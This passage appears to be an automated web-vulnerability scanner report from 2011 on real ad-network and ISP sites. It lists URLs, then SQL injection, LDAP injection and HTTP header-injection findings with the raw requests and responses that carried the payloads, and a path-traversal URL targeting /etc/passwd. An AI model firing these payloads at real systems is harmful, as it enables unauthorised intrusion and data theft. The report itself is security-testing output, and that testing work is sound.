22.11. http://vtr.com/productos/principal/inc/js/jquery.dimensions.js

22.12. http://vtr.com/productos/principal/inc/js/jquery.pngFix.pack.js

22.13. http://vtr.com/productos/principal/inc/js/php.full.min.js

22.14. http://vtr.com/productos/principal/inc/js/shadowbox/adapters/shadowbox-jquery.js

22.15. http://vtr.com/productos/principal/inc/js/shadowbox/shadowbox.css

22.16. http://vtr.com/productos/principal/inc/js/shadowbox/shadowbox.js

22.17. http://www.bizoservices.com/

22.18. http://www.bizoservices.com/about.html

22.19. http://www.bizoservices.com/careers.html

22.20. http://www.bizoservices.com/contact.aspx

22.21. http://www.bizoservices.com/cortex/bb/bb_reg.aspx

22.22. http://www.bizoservices.com/cortex/ef/ef_reg_free.aspx

22.23. http://www.bizoservices.com/index.html

22.24. http://www.bizoservices.com/partners.aspx

22.25. http://www.bizoservices.com/pricing.aspx

22.26. http://www.bizoservices.com/services.html

22.27. http://www.bizoservices.com/services/av.html

22.28. http://www.bizoservices.com/services/av_faqs.html

22.29. http://www.bizoservices.com/services/backoffice.html

22.30. http://www.bizoservices.com/services/bizomail_lite.html

22.31. http://www.bizoservices.com/services/bizomail_std.html

22.32. http://www.bizoservices.com/services/cortex/bb/bb_reg.aspx

22.33. http://www.bizoservices.com/services/cortex/ef/ef_reg_free.aspx

22.34. http://www.bizoservices.com/services/defend_perimeter.html

22.35. http://www.bizoservices.com/services/desktop_security.html

22.36. http://www.bizoservices.com/services/email_filter.html

22.37. http://www.bizoservices.com/services/email_guard.html

22.38. http://www.bizoservices.com/services/hosting.html

22.39. http://www.bizoservices.com/services/internet_addon.html

22.40. http://www.bizoservices.com/services/internet_connection.html

22.41. http://www.bizoservices.com/services/office_connect.html

22.42. http://www.bizoservices.com/services/online_backup.html

22.43. http://www.bizoservices.com/services/online_system_monitor.html

22.44. http://www.bizoservices.com/services/pay_roll.html

22.45. http://www.bizoservices.com/services/shareddrive.html

22.46. http://www.bizoservices.com/services/talk/pabx.html

22.47. http://www.bizoservices.com/services/talk/telemarket.html

22.48. http://www.bizoservices.com/services/talk/telephone.html

22.49. http://www.bizoservices.com/services/talk/tolls.html

22.50. http://www.bizoservices.com/services/talk/virtual_reception.html

22.51. http://www.bizoservices.com/services/web_filter.html

22.52. http://www.bizoservices.com/support.html

22.53. http://www.gnu.org/licenses/gpl.html

22.54. http://www.kol.co.nz/contact.php

22.55. http://www.kol.co.nz/terms_conditions.php

22.56. http://www.opensource.org/licenses/gpl-license.php

22.57. http://www.opensource.org/licenses/mit-license.php

22.58. http://www.orcon.net.nz/lifestyle

22.59. http://www.orcon.net.nz/lifestyle/rss

22.60. http://www.orcon.net.nz/scripts/jquery.pngFix.pack.js

22.61. http://www.orcon.net.nz/support/network_status_rss

22.62. http://www.orcon.net.nz/support/talk

22.63. http://www.orcon.net.nz/work/

22.64. http://www.orcon.net.nz/work/=&ref=iserve

22.65. http://www.orcon.net.nz/work/business_hosting

22.66. http://www.orcon.net.nz/work/business_internet

22.67. http://www.orcon.net.nz/work/business_phone_sip_trunk

22.68. http://www.orcon.net.nz/work/hosting_plans/

22.69. http://www.orcon.net.nz/work/page/business_broadband_overview

22.70. http://www.orcon.net.nz/work/page/business_phone_line

22.71. http://www.orcon.net.nz/work/page/business_server_dedicated

22.72. http://www.orcon.net.nz/work/page/business_server_hosting_overview

22.73. http://www.orcon.net.nz/work/page/business_server_software

22.74. http://www.orcon.net.nz/work/page/business_server_virtual

22.75. http://www.orcon.net.nz/work/page/case_study_certus

22.76. http://www.orcon.net.nz/work/page/case_study_speedscan

22.77. http://www.orcon.net.nz/work/page/case_study_zeald

22.78. http://www.orcon.net.nz/work/page/cloud_computing_overview

22.79. http://www.orcon.net.nz/work/page/co-location

22.80. http://www.orcon.net.nz/work/page/domain_names_overview

22.81. http://www.orcon.net.nz/work/page/fibre_optic

22.82. http://www.orcon.net.nz/work/page/free_domain_hosting

22.83. http://www.orcon.net.nz/work/page/hosted_exchange

22.84. http://www.orcon.net.nz/work/page/hsns

22.85. http://www.orcon.net.nz/work/page/register_a_domain

22.86. http://www.orcon.net.nz/work/page/sip_trunk

22.87. http://www.orcon.net.nz/work/page/sip_trunk_data_sheet

22.88. http://www.orcon.net.nz/work/page/wan

22.89. http://www.orcon.net.nz/work/page/zealous_support

22.90. http://www.orcon.net.nz/work/plans

22.91. http://www.orcon.net.nz/work/wholesale_services

22.92. http://www.righthealth.com/

22.93. http://www.tagged.com/safety.html

22.94. http://www.tagged.com/terms_of_service.html

23. Private IP addresses disclosed

23.1. http://api.facebook.com/restserver.php

23.2. http://static.ak.fbcdn.net/connect.php/js/FB.Share

23.3. http://www.facebook.com/plugins/like.php

24. Robots.txt file

24.1. http://a.dlqm.net/adscgen/log_ut_err.php

24.2. http://about-tagged.com/

24.3. http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932

24.4. http://ads.pointroll.com/PortalServe/

24.5. http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

24.6. http://amch.questionmarket.com/adscgen/sta.php

24.7. http://api.facebook.com/restserver.php

24.8. http://apnxscm.ac3.msn.com:81/CACMSH.ashx

24.9. http://b.scorecardresearch.com/p

24.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs

24.11. http://c.betrad.com/surly.js

24.12. http://c5.zedo.com/jsc/c5/ff2.html

24.13. http://c7.zedo.com/bar/v16-406/c5/jsc/gl.js

24.14. http://cm.g.doubleclick.net/pixel

24.15. http://code.google.com/p/swfobject/

24.16. https://d2s.iserve.net.nz:8443/

24.17. http://ds.serving-sys.com/BurstingRes//Site-8706/Type-11/3342702_4909a619-2096-49cc-b852-03772e7f690e.js

24.18. http://feeds.bbci.co.uk/news/rss.xml

24.19. http://fonts.googleapis.com/css

24.20. http://googleads.g.doubleclick.net/pagead/ads

24.21. http://help.tagged.com/index.php/report-abuse.html

24.22. http://jigsaw.w3.org/css-validator/validator-text.html

24.23. http://jquery.andreaseberhard.de/

24.24. https://mail.orcon.net.nz/

24.25. http://malsup.com/jquery/cycle/

24.26. http://medienfreunde.com/lab/innerfade/

24.27. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

24.28. http://pixel.quantserve.com/pixel

24.29. http://player.ooyala.com/player.js

24.30. http://pubads.g.doubleclick.net/gampad/ads

24.31. http://r1-ads.ace.advertising.com/site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

24.32. http://r1.zedo.com/log/ERR.gif

24.33. http://safebrowsing.clients.google.com/safebrowsing/downloads

24.34. http://secure.tagged.com/

24.35. https://secure.tagged.com/secure_login.html

24.36. http://segment-pixel.invitemedia.com/pixel

24.37. http://speed.pointroll.com/PointRoll/Media/Panels/Ford/724287/FDAF_2011_Shared_300x250_Default.jpg

24.38. http://tag.admeld.com/match

24.39. http://tcr.tynt.com/javascripts/Tracer.js

24.40. http://themes.googleusercontent.com/font

24.41. http://translate.googleapis.com/translate_a/t

24.42. http://tweetbeat.com/

24.43. http://webmail.orcon.net.nz/

24.44. http://www.benjaminsterling.com/experiments/jqShuffle/

24.45. http://www.bizoservices.com/

24.46. http://www.facebook.com/plugins/like.php

24.47. http://www.gnu.org/licenses/gpl.html

24.48. http://www.google-analytics.com/__utm.gif

24.49. http://www.googleadservices.com/pagead/conversion/1034849195/

24.50. http://www.kosmix.com/

24.51. http://www.mathias-bank.de/

24.52. http://www.opensource.org/licenses/gpl-license.php

24.53. http://www.orcon.net.nz/work/=&ref=iserve

24.54. http://www.righthealth.com/

24.55. http://www.tagged.com/

25. Cacheable HTTPS response

25.1. https://console.iserve.net.nz/favicon.ico

25.2. https://console.iservices.net.nz/favicon.ico

25.3. https://d2s.iserve.net.nz:8443/

25.4. https://d2s.iserve.net.nz:8443/docs/classifier.html

25.5. https://d2s.iserve.net.nz:8443/docs/concepts.html

25.6. https://d2s.iserve.net.nz:8443/docs/damnspam.html

25.7. https://d2s.iserve.net.nz:8443/docs/faq.html

25.8. https://d2s.iserve.net.nz:8443/docs/global.html

25.9. https://d2s.iserve.net.nz:8443/docs/index.html

25.10. https://d2s.iserve.net.nz:8443/docs/prefs.html

25.11. https://d2s.iserve.net.nz:8443/docs/remove-spam.html

25.12. https://d2s.iserve.net.nz:8443/docs/stats.html

25.13. https://d2s.iserve.net.nz:8443/docs/training.html

25.14. https://d2s.iserve.net.nz:8443/index.html

25.15. https://d2s.iserve.net.nz:8443/scripts//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

25.16. https://idm.net.nz/favicon.ico

25.17. https://idm.net.nz/secure/

25.18. https://idm.net.nz/secure/index.php

25.19. https://orcres.cosmos.net.nz/orconmembersarea.php

25.20. https://secure.tagged.com/blank.html

25.21. https://secure.tagged.com/favicon.ico

26. Multiple content types specified

27. HTML does not specify charset

27.1. http://ads.pointroll.com/PortalServe/

27.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs

27.3. http://c5.zedo.com/jsc/c5/ff2.html

27.4. https://d2s.iserve.net.nz:8443/d2s/ViewAccount

27.5. http://jigsaw.w3.org/css-validator/validator-text.html

27.6. https://orcres.cosmos.net.nz/orconmembersarea.php

27.7. http://uac.advertising.com/wrapper/aceUACping.htm

27.8. http://webmail.iserve.net.nz/

27.9. http://www.bizoservices.com/pricing.html

27.10. http://www.bizoservices.com/protect/protect.html

28. Content type incorrectly stated

28.1. http://about-tagged.com/wp-content/themes/wptagged/favicon.ico

28.2. http://ads.pointroll.com/PortalServe/

28.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs

28.4. https://console.iserve.net.nz/favicon.ico

28.5. https://console.iservices.net.nz/favicon.ico

28.6. https://idm.net.nz/favicon.ico

28.7. https://orcres.cosmos.net.nz/orconmembersarea.php

28.8. https://secure.tagged.com/favicon.ico

28.9. http://svirtual.vtr.net/svweb/inc/js/validarut.js

28.10. http://thumbnails.truveo.com/0018/FD/06/FD0609A01D0D44E2D627FC.jpg

28.11. http://thumbnails.truveo.com/0020/12/A0/12A0B49C467F2FB5151A6C.jpg

28.12. http://thumbnails.truveo.com/0020/16/E9/16E9F7CBA751E8079C1E52.jpg

28.13. http://translate.googleapis.com/translate_a/t

28.14. http://vtr.com/favicon.ico

28.15. http://vtr.com/icono.ico

28.16. http://vtr.com/productos/principal/selector_comuna/sesion.php

28.17. http://www.tagged.com/api/

28.18. http://www.tagged.com/favicon.ico



1. SQL injection

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/N2465.AOLanywhere/B5391584.3

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 95066298'%20or%201%3d1--%20 and 95066298'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

Request 1

GET /adj/N2465.AOLanywhere/B5391584.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/mnum=0001013955/cstr=24692193=_4dd01da9,1681601282,776692%5E1013955%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=24692193/optn=64?trg=;ord=1681601282?&195066298'%20or%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=1964
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 15 May 2011 18:39:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6372

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Thu Apr 14 17:17:05 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\n\n');



function DCFlash(id,pVM){

var swf = "http://s0.2mdn.net/1104996/sg-728x90.swf";

var gif = "http://s0.2mdn.net/1104996/Save gas_Q3_728x90_4.1.gif";

var minV = 10;

var FWH = ' width="728" height="90" ';

var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b08/f/b5/%2a/h%3B239326039%3B0-0%3B0%3B62235844%3B3454-728/90%3B41548954/41566741/2%3B%3B%7Esscs%3D%3fhttp://r1-ads.ace.advertising.com/click/site=0000776692/mnum=0001013955/cstr=24692193=_4dd01da9,1681601282,776692%5E1013955%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=24692193/optn=64?trg=http%3a%2f%2fwww.autozone.com/autozone/landing/page.jsp%3Fname%3Dsave-gas-improve-mileage%26cmpid%3DF11_040");

var fscUrl = url;

var fscUrlClickTagFound = false;

var wmode = "opaque";

var bg = "";

var dcallowscriptaccess = "never";



var openWindow = "false";

var winW = 0;

var winH = 0;

var winL = 0;

var winT = 0;



var moviePath=swf.substring(0,swf.lastIndexOf("/"));

var sm=new Array();





var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b08/f/b5/%2a/h%3B239326039%3B0-0%3B0%3B62235844%3B3454-728/90%3B41548954/41566741/2%3B%3B%7Esscs%3D%3fhttp://r1-ads.ace.advertising.com/click/site=0000776692/mnum=0001013955/cstr=24692193=_4dd01da9,1681601282,776692%5E1013955%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=24692193/optn=64?trg=http%3a%2f%2fwww.autozone.com/autozone/landing/page.jsp%3Fname%3Dsave-gas-improve-mileage%26cmpid%3DF11_040");

var ctp=new Array();

var ctv=new Array();

ctp[0] = "clickTAG";
ctv[0] = "";




var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';

for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}

for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {

var ctParam = ctp[ctIndex];

var ctVal = ctv[ctIndex];

if(ctVal != null && typeof(ctVal) == 'string') {

if(ctVal == "") {

ctVal = defaultCtVa
...[SNIP]...

Request 2

GET /adj/N2465.AOLanywhere/B5391584.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/mnum=0001013955/cstr=24692193=_4dd01da9,1681601282,776692%5E1013955%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=24692193/optn=64?trg=;ord=1681601282?&195066298'%20or%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=1964
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 15 May 2011 18:39:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6082

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed May 04 13:46:28 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');

function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1104996/AZ_Brakes_728x90_Q4_P10.swf";
var gif = "http://s0.2mdn.net/1104996/AZ_Brakes_728x90_Q4_P10.gif";
var minV = 9;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b08/f/b5/%2a/r%3B239326039%3B1-0%3B0%3B62235844%3B3454-728/90%3B42022885/42040672/1%3B%3B%7Esscs%3D%3fhttp://r1-ads.ace.advertising.com/click/site=0000776692/mnum=0001013955/cstr=24692193=_4dd01da9,1681601282,776692%5E1013955%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=24692193/optn=64?trg=http%3a%2f%2fwww.autozone.com/autozone/brakeJob/brakeJob.jsp%3Fcmpid%3DF11_028");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b08/f/b5/%2a/r%3B239326039%3B1-0%3B0%3B62235844%3B3454-728/90%3B42022885/42040672/1%3B%3B%7Esscs%3D%3fhttp://r1-ads.ace.advertising.com/click/site=0000776692/mnum=0001013955/cstr=24692193=_4dd01da9,1681601282,776692%5E1013955%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=24692193/optn=64?trg=http%3a%2f%2fwww.autozone.com/autozone/brakeJob/brakeJob.jsp%3Fcmpid%3DF11_028");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";
ctp[1] = "clickTag";
ctv[1] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;

...[SNIP]...

2. LDAP injection

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The Pos parameter appears to be vulnerable to LDAP injection attacks.

The payloads 36e55bf8967b52bb)(sn=* and 36e55bf8967b52bb)!(sn=* were each submitted in the Pos parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /BurstingPipe/BannerSource.asp?FlightID=1686177&Page=&PluID=0&Pos=36e55bf8967b52bb)(sn=* HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eyeblaster=FLV=0&RES=128&WMPV=0; B3=98IM0000000000uz6rGx0000000003uE9v950000000001uz94DX0000000002uz; A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002cM5KaNgA0aR600003iN4OaLyu0d9d00000; C4=; u2=0354b6eb-fc5d-4f2c-b244-3b1b2becc2f03I5020; ActivityInfo=000iPlceU%5f;

Response 1

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-8706/Type-0/2431cb34-cff9-4ab3-9273-74ecfd5a422b.jpg
Server: Microsoft-IIS/7.5
Set-Cookie: A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002iN4OaLyu0d9d00000cM5KaNgL0aR600004; expires=Sat, 13-Aug-2011 13:35:40 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=98IM0000000000uz6rGx0000000004uE9v950000000001uz94DX0000000002uz; expires=Sat, 13-Aug-2011 13:35:40 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=0354b6eb-fc5d-4f2c-b244-3b1b2becc2f03I502g; expires=Sat, 13-Aug-2011 13:35:40 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_36e55bf8967b52bb)(sn=*=3342702
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:35:40 GMT
Connection: close

Request 2

GET /BurstingPipe/BannerSource.asp?FlightID=1686177&Page=&PluID=0&Pos=36e55bf8967b52bb)!(sn=* HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eyeblaster=FLV=0&RES=128&WMPV=0; B3=98IM0000000000uz6rGx0000000003uE9v950000000001uz94DX0000000002uz; A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002cM5KaNgA0aR600003iN4OaLyu0d9d00000; C4=; u2=0354b6eb-fc5d-4f2c-b244-3b1b2becc2f03I5020; ActivityInfo=000iPlceU%5f;

Response 2

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-8706/Type-0/2431cb34-cff9-4ab3-9273-74ecfd5a422b.jpg
Server: Microsoft-IIS/7.5
Set-Cookie: A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002iN4OaLyu0d9d00000cM5KaNgL0aR600004; expires=Sat, 13-Aug-2011 13:35:40 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=98IM0000000000uz6rGx0000000004uE9v950000000001uz94DX0000000002uz; expires=Sat, 13-Aug-2011 13:35:40 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=0354b6eb-fc5d-4f2c-b244-3b1b2becc2f03I502g; expires=Sat, 13-Aug-2011 13:35:40 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_36e55bf8967b52bb)!(sn=*=3342702
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:35:40 GMT
Connection: close


3. HTTP header injection
There are 3 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 3b2a2%0d%0a69848788ea5 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=3342702~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~13~0~01020^ebAboveTheFoldDuration~13~0~01020&OptOut=0&ebRandom=0.7164087416689661&flv=3b2a2%0d%0a69848788ea5&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.orcon.net.nz/work/=&ref=iserve
Origin: http://www.orcon.net.nz

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=c359dff1-3bf6-432c-88ff-c6a59b4bf0723I5030; expires=Sat, 13-Aug-2011 13:23:24 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=3b2a2
69848788ea5
&RES=128&WMPV=0; expires=Sat, 13-Aug-2011 13: 23:24 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:23:23 GMT
Connection: close
Content-Length: 0


3.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload d9a0a%0d%0a0414bf43704 was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=3342702~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~13~0~01020^ebAboveTheFoldDuration~13~0~01020&OptOut=0&ebRandom=0.7164087416689661&flv=0&wmpv=0&res=d9a0a%0d%0a0414bf43704 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.orcon.net.nz/work/=&ref=iserve
Origin: http://www.orcon.net.nz

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=d0cfa857-fccc-4fa5-87fe-6b168874f10b3I5040; expires=Sat, 13-Aug-2011 13:23:25 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=0&RES=d9a0a
0414bf43704
&WMPV=0; expires=Sat, 13-Aug-2011 13: 23:25 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:23:25 GMT
Connection: close
Content-Length: 0


3.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 4922e%0d%0af6434b7c936 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=3342702~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~13~0~01020^ebAboveTheFoldDuration~13~0~01020&OptOut=0&ebRandom=0.7164087416689661&flv=0&wmpv=4922e%0d%0af6434b7c936&res=128 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.orcon.net.nz/work/=&ref=iserve
Origin: http://www.orcon.net.nz

Response

